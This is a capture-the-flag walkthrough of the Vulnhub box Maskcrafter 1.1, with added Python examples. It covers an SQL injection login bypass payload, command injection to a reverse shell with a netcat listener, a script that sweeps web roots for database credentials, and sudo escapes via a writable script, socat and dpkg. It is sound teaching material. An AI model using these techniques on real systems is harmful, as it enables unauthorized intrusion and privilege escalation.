Let’s do Maskcrafter 1.1, a download from Vulnhub.com. This box is classified by the creator as “Beginner” level. While I agree that it did not take any advanced knowledge to root the box, I would argue that the number of steps it took to get to root, the enumeration it required, and the number of rabbit-holes puts it at a more difficult level than your average Vulnhub “Easy” box. That said, I found this box interesting and worth all the time to work through. What did you think?
Initial Enumeration and Low-Privilege Shell
After getting our VM set up in VMware Player, we start with our nmap scans.
We have a lot to investigate. Any time I see anonymous FTP, I will try that first, hoping to get a quick strike. This box didn't disappoint.
We get two files from the FTP site, NOTES.txt and cred.zip. The zip file is password protected, but the text file gives us some good information for our web enumeration.
We continue to the webserver. The default page gives us a login screen.
NOTES.txt tells us that the site is vulnerable to SQL injection. I used Burp Repeater and was able to bypass the login screen with one of the basic SQL injection tests from OWASP.
However, after bypassing the login, we seem to reach a dead end.
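Why one of the basic OWASP test strings gets past a login form like this one is easiest to see with the query in front of you. The following is an added example, not the box's PHP and not code from the original write-up: a throwaway SQLite user table, a login check that concatenates the submitted values into the query (the class of bug NOTES.txt hints at), and the parameterized version that is immune to the same input. The table contents and the `' OR '1'='1` payload are assumptions; the post does not quote the exact string it used.

```python
"""Added example (not from the original write-up): string-built login query
versus a parameterized one, driven with a classic boolean-OR payload.
The users table, its rows and the payload are constructed here."""
import sqlite3

# Assumed test string; the post only says "one of the basic OWASP tests".
PAYLOAD = "' OR '1'='1"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('guest', 'guest')")
    return con


def injected_sql(username, password):
    # What the vulnerable code actually sends to the database once the
    # submitted values are pasted into the statement text.
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(con, username, password):
    # The quote in the payload closes the string literal, and the rest becomes
    # SQL syntax: ... username = '' OR '1'='1' AND password = '' OR '1'='1'
    row = con.execute(injected_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    # Bound parameters: the same text is compared as data and never parsed.
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(injected_sql(PAYLOAD, PAYLOAD))
    print("vulnerable login returns:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("safe login returns:", login_safe(db, PAYLOAD, PAYLOAD))
```

The trailing `OR '1'='1'` is true for every row, so the vulnerable check returns the first user in the table, which is why a successful bypass often lands you as the first account created rather than one you chose.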
Let's move on to the /debug directory mentioned in NOTES.txt. Navigating there in Firefox brings us to a page that lets us run a handful of preselected shell commands.
Hopefully when you see something like this, your first thought will be to capture a request in Burp Suite and see what you can abuse. Here is the captured request.
If we modify the value we pass in the "command=" parameter, we can execute arbitrary shell commands. We can do plenty of enumeration this way, but the goal should always be a proper interactive shell. I tried at least five or six reverse shells from pentestmonkey's reverse shell cheat sheet before finally finding one that worked for me. Two things to get right: the payload must be URL-encoded before it goes into the request (characters like &, > and spaces will otherwise be eaten by the form parsing), and your netcat listener, "nc -nvlp 8001" on the attacker box, has to be up on the same port the payload calls back to before you send the command.
Post-Exploit Enumeration
As we so often do in web app pentesting, we get a shell as the low-privilege user www-data and start out in the /var/www/html/debug folder. Now I have to confess that instead of enumerating the local folders I moved straight into home directory enumeration. This was an error that cost me quite a few hours and led me down a number of rabbit-holes. I investigated or attempted, in no particular order:
- Linux kernel exploits
- NFS enumeration
- Cracking the .htpasswd hash with hashcat (smh!)
- Enumerating the phpmyadmin mysql database, which linpeas.sh detects
- Checking SUID files on GTFOBins
- The mysterious /source folder (is that a rabbit hole or can you actually do something with it?)
- Grep’ing through files for passwords in plain text
- Looking through the box creator’s Github site, which is referenced in /source
- More things that I’m forgetting
What I could have done on getting my initial shell was to look through the /var/www/html folder, where I would have found the file db.php that holds connection details for another MySQL database. This should also have been obvious to me from my initial investigation of the web server.
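The lesson of this section is a habit rather than a trick: the moment you land in a web root, sweep it for configuration files before wandering off to /home. The following is an added example of that sweep, not the post's own steps and not the box's real db.php (whose contents the post does not quote). It builds a throwaway web root in a temp directory with a constructed db.php, then walks it for config-looking file names and pulls out credential-style assignments and mysqli_connect() calls. File-name patterns, variable names and the sample values are assumptions.

```python
"""Added example (not from the post): sweep a web root for config files and
extract credential-looking assignments. The web root and db.php are
constructed in a temp directory; values are invented."""
import os
import re
import tempfile

# Names that usually hold connection settings (assumed patterns).
CONFIG_NAMES = re.compile(r"(db|config|conn|settings|wp-config)[^/]*\.(php|inc|ini|env)$", re.I)
# $variable = "value";  style assignments whose name smells like a credential.
CRED_LINE = re.compile(
    r"""^\s*\$?(\w*(?:user|pass|pwd|host|server|db|database)\w*)\s*=\s*['"]([^'"]*)['"]""",
    re.I | re.M,
)
CONNECT_CALL = re.compile(r"mysqli?_connect\s*\(([^)]*)\)", re.I)


def find_db_credentials(webroot):
    """Return (path, name, value) tuples for anything credential-like."""
    findings = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if not CONFIG_NAMES.search(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for var, value in CRED_LINE.findall(text):
                findings.append((path, var, value))
            for args in CONNECT_CALL.findall(text):
                findings.append((path, "connect", args.strip()))
    return findings


# Constructed stand-in for the box's db.php; not the real file.
SAMPLE_DB_PHP = """<?php
// constructed sample, not the box's real db.php
$servername = "localhost";
$username = "webuser";
$password = "ExamplePass1";
$dbname = "webapp";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
"""


def demo():
    """Build a fake /var/www/html and sweep it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "debug"))
    with open(os.path.join(root, "db.php"), "w") as fh:
        fh.write(SAMPLE_DB_PHP)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'login'; ?>\n")
    return find_db_credentials(root)


if __name__ == "__main__":
    for path, name, value in demo():
        print("%s: %s = %s" % (os.path.basename(path), name, value))
```

On a real box you would point `find_db_credentials` at /var/www/html (or whatever DocumentRoot the vhost config names) from the www-data shell; the same sweep is what tools like linpeas do in their "interesting files" section, but doing it by hand first keeps you from skipping straight to kernel exploits.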
MySQL Enumeration
As previously mentioned, in the file /var/www/html/db.php we find MySQL connection credentials. Let's log in with them and look through the database.
Finally we have the elusive password to the zip file we found via anonymous FTP! The two user accounts in the database belong to the (I believe) useless login.php page. Let's concentrate on the zip file.
Sudo Privileges and Root Shell
Now we have login creds for userx, and from here on we can SSH into the box instead of working through our reverse shell. I did an "su" to userx and enumerated userx's home directory, which appeared to be a dead end. However, userx has sudo privileges.
The script whatsmyid.sh doesn't do much, but since userx can write to it, we can make it do something more useful. I used vim to edit the script so that it executes "/bin/bash" instead of just "id". Let's run it again, this time with our sudo privileges. (This only works because the script itself is writable by userx; a sudo rule pointing at a root-owned, non-writable script would give us nothing here, so check with ls -l before editing.)
While it didn't get us to root, we are now user "evdaez" and have more sudo privileges. GTFOBins tells us how to abuse sudo privileges for /usr/bin/socat.
We get a shell as researcherx, who also has their own sudo privileges. We improve our shell to a full TTY, which the dpkg trick depends on: dpkg -l only hands its listing to a pager, where the escape lives, when it is writing to a terminal. Then we once again consult GTFOBins on how to abuse sudo privileges for dpkg.
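The three hops above (userx to evdaez through a writable script, evdaez to researcherx through socat, researcherx to root through dpkg) are each answered by the same two questions about a `sudo -l` entry: can I write to the thing it runs, and does the binary have a known sudo escape? The following added example, not the post's own commands, parses `sudo -l` output and applies both checks. The sample listing is constructed and lumps the three rules into one user's output for brevity (on the box each rule is seen from the respective account); the script path is a temp file standing in for whatsmyid.sh. The two escape commands are the GTFOBins entries for socat and dpkg under sudo.

```python
"""Added example (not from the post): triage sudo -l output for writable
targets and binaries with known GTFOBins sudo escapes.
The sudo -l text and the script path are constructed."""
import os
import re
import tempfile

# GTFOBins sudo escapes for the two binaries named in the write-up.
GTFOBINS_SUDO = {
    "socat": "sudo -u <runas> socat stdin exec:/bin/sh",
    "dpkg": "sudo -u <runas> dpkg -l   # then type !/bin/sh at the pager prompt (needs a tty)",
}

# Matches lines like "    (evdaez) NOPASSWD: /home/userx/whatsmyid.sh".
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (runas_user, nopasswd, command) for each rule in sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(user : group)" -> user
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((runas, nopasswd, cmd.strip()))
    return rules


def triage(text):
    report = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        path = cmd.split()[0]
        notes = []
        # Hop 1 on the box: the rule runs a script we own, so we can rewrite it.
        if os.path.isfile(path) and os.access(path, os.W_OK):
            notes.append("writable target: replace its body with /bin/bash and run it")
        if os.path.islink(path):
            notes.append("symlink: check the link target and its directory too")
        # Hops 2 and 3: binaries with a published sudo escape.
        escape = GTFOBINS_SUDO.get(os.path.basename(path))
        if escape:
            notes.append(escape.replace("<runas>", runas))
        report.append({"runas": runas, "nopasswd": nopasswd, "command": cmd, "notes": notes})
    return report


def demo():
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, "whatsmyid.sh")       # stand-in for the real script
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\nid\n")
    os.chmod(script, 0o755)                           # owned and writable by us
    sample = (                                        # constructed sudo -l output
        "User userx may run the following commands on maskcrafter:\n"
        "    (evdaez) NOPASSWD: %s\n"
        "    (researcherx) NOPASSWD: /usr/bin/socat\n"
        "    (root) NOPASSWD: /usr/bin/dpkg\n" % script
    )
    return triage(sample)


if __name__ == "__main__":
    for rule in demo():
        print("(%s) %s" % (rule["runas"], rule["command"]))
        for note in rule["notes"]:
            print("    ->", note)
```

The dpkg note is the reason the shell upgrade matters: the `!/bin/sh` escape is typed at the pager, and dpkg only uses a pager when its output is a terminal, so in a bare reverse shell `sudo dpkg -l` just scrolls the package list past you.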
And we have gotten a root shell! We are told that there is a second way to root. Did you find this one? Drop a comment and let me know. Thanks for reading!